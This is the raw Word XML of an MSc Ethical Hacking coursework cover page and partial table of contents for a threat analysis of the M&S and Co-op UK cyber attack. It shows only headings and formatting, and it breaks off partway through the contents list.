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37296" w14:textId="77777777" w:rsidR="00BF7D8D" w:rsidRDefault="00BF7D8D">
      <w:pPr>
        <w:spacing w:before="1200" w:after="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0369F5DD" w14:textId="77777777" w:rsidR="00BF7D8D" w:rsidRDefault="00BF7D8D" w:rsidP="00BF7D8D">
      <w:pPr>
        <w:spacing w:before="1200" w:after="200"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C2AF2BA" w14:textId="77777777" w:rsidR="00BF7D8D" w:rsidRDefault="00BF7D8D" w:rsidP="00BF7D8D">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="372CA8F5" w14:textId="77777777" w:rsidR="00BF7D8D" w:rsidRDefault="00BF7D8D" w:rsidP="00BF7D8D">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79758A56" w14:textId="77777777" w:rsidR="00BF7D8D" w:rsidRDefault="00BF7D8D" w:rsidP="00BF7D8D">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6451A45F" w14:textId="77777777" w:rsidR="00BF7D8D" w:rsidRDefault="00BF7D8D" w:rsidP="00BF7D8D">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="607FA390" w14:textId="77777777" w:rsidR="00BF7D8D" w:rsidRDefault="00BF7D8D" w:rsidP="00BF7D8D">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="317EE36F" w14:textId="77777777" w:rsidR="00BF7D8D" w:rsidRDefault="00BF7D8D" w:rsidP="00BF7D8D">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39CAA210" w14:textId="77777777" w:rsidR="00BF7D8D" w:rsidRDefault="00BF7D8D" w:rsidP="00BF7D8D">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AD9AC0D" w14:textId="77777777" w:rsidR="00BF7D8D" w:rsidRDefault="00BF7D8D" w:rsidP="00BF7D8D">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F41D9DB" w14:textId="77777777" w:rsidR="00BF7D8D" w:rsidRPr="00BF7D8D" w:rsidRDefault="00BF7D8D" w:rsidP="00BF7D8D">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF7D8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Programme: MSc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PgDip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">/PgCert </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4F91C9" w14:textId="77777777" w:rsidR="00BF7D8D" w:rsidRPr="00BF7D8D" w:rsidRDefault="00BF7D8D" w:rsidP="00BF7D8D">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF7D8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Cybersecurity and Digital Forensics </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B251E63" w14:textId="77777777" w:rsidR="00BF7D8D" w:rsidRPr="00BF7D8D" w:rsidRDefault="00BF7D8D" w:rsidP="00BF7D8D">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF7D8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Module: Ethical Hacking Module code: ACCA7033</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587BB504" w14:textId="77777777" w:rsidR="00BF7D8D" w:rsidRPr="00BF7D8D" w:rsidRDefault="00BF7D8D" w:rsidP="00BE46BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CDC4275" w14:textId="77777777" w:rsidR="00BF7D8D" w:rsidRPr="00BF7D8D" w:rsidRDefault="00BF7D8D" w:rsidP="00BF7D8D">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF7D8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Student name: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EE3A7A" w14:textId="0305FE4F" w:rsidR="00BE46BA" w:rsidRDefault="00BF7D8D" w:rsidP="00BF7D8D">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF7D8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Student ID number:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF7D8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F9C65A" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-1000889184"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="64948007" w14:textId="083B334F" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="45ADE52E" w14:textId="5E7D8E64" w:rsidR="006A15E7" w:rsidRDefault="00BE46BA">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="963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127094" w:history="1">
            <w:r w:rsidR="006A15E7" w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>TASK 1 — Strategic Threat Analysis: The M&amp;S &amp; Co-op UK Cyber Attack</w:t>
            </w:r>
            <w:r w:rsidR="006A15E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006A15E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006A15E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127094 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006A15E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006A15E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006A15E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="006A15E7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3B3DEC2E" w14:textId="6B5B73E9"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095" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Abstract</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127095 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="519A6BB7" w14:textId="3159825C"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096" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1. Incident Summary and Timeline</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127096 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C231E81" w14:textId="38B3167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097" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1 Executive Summary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127097 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A55F83A" w14:textId="319A9A8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098" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2 Chronological Timeline</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127098 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2F20C035" w14:textId="66E4B7A9"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099" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2. Adversary TTP Mapping — MITRE ATT&amp;CK Enterprise</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127099 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="167A83C1" w14:textId="53B7D048"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0" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1 Attack Flow Narrative</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127100 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="751D3610" w14:textId="17673215"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01" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3. Root Cause and Security Control Failures</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127101 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7CAFF16E" w14:textId="2C0F4568"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2" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1 Human Factor — Social Engineering of the Helpdesk</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127102 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04CDFF47" w14:textId="05402CAE"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3" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2 Third-Party / Supply-Chain Risk</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127103 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6DC6F313" w14:textId="0D856B5B"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4" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3 Network Architecture — Insufficient Segmentation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127104 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04680728" w14:textId="4DE92971"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5" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4 Detection Latency — Absence of Real-Time Behavioural Alerting</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127105 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="25E748B3" w14:textId="499BF7C1"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6" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5 MFA Control Failure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127106 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34DCB339" w14:textId="6809CFB0"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07" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4. Threat Actor Profile and Motive</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127107 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="11D47464" w14:textId="2C693D4F"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8" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1 Attribution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127108 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1E81DC46" w14:textId="2C48C9D4"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09" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2 Motive</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127109 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
